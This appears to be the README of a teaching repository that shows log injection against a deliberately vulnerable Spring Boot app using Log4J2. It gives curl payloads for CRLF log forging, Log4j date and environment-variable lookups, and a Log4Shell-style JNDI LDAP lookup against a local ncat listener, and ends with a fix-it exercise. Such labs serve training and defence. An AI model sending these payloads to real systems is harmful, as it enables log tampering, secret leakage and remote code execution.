Log Injection with Spring Boot and Log4J2

Usage

Run

./gradlew bootRun

Request

curl http://localhost:8080/\?name\=Frodon

Hack

Using CRLF injection

curl http://localhost:8080/\?name\=Marty%0d%0a1985-10-30%2021%3A59%3A01.108%20DEBUG%20128537%20---%20%5Bnio-8080-exec-1%5D%20net.example.logging.HelloController%20%20%20%20%20%20%3A%20You%20have%20been%20pwed%0A

Using date lookup

Date lookup ${date:yyyyMMdd-HHmmss}:

curl http://localhost:8080/\?name\=%24%7Bdate%3AyyyyMMdd-HHmmss%7D

Using env lookup

Env lookup ${env:USER}:

curl http://localhost:8080/\?name\=%24%7Benv%3AUSER%7D

Using JNDI Injection

Run a listener

ncat -v -l -p 5000

JNDI LDAP lookup: Hello ${jndi:ldap://localhost:5000}%

curl http://localhost:8080/\?name\=%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A5000%7D

Fix

Try to fix this app! Don't disable JNDI Lookup, this could be usefull.

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
gradle/wrapper		gradle/wrapper
src		src
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
build.gradle		build.gradle
gradlew		gradlew
gradlew.bat		gradlew.bat
settings.gradle		settings.gradle

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

gradle/wrapper

gradle/wrapper

src

src

.gitignore

.gitignore

LICENSE

LICENSE

README.md

README.md

build.gradle

build.gradle

gradlew

gradlew

gradlew.bat

gradlew.bat

settings.gradle

settings.gradle

Repository files navigation

Log Injection with Spring Boot and Log4J2

Usage

Hack

Using CRLF injection

Using date lookup

Using env lookup

Using JNDI Injection

Fix

About

Releases

Packages

Languages

License

octo-technology/log-injection-spring-boot-log4j2

Folders and files

Latest commit

History

Repository files navigation

Log Injection with Spring Boot and Log4J2

Usage

Hack

Using CRLF injection

Using date lookup

Using env lookup

Using JNDI Injection

Fix

About

Resources

License

Stars

Watchers

Forks

Languages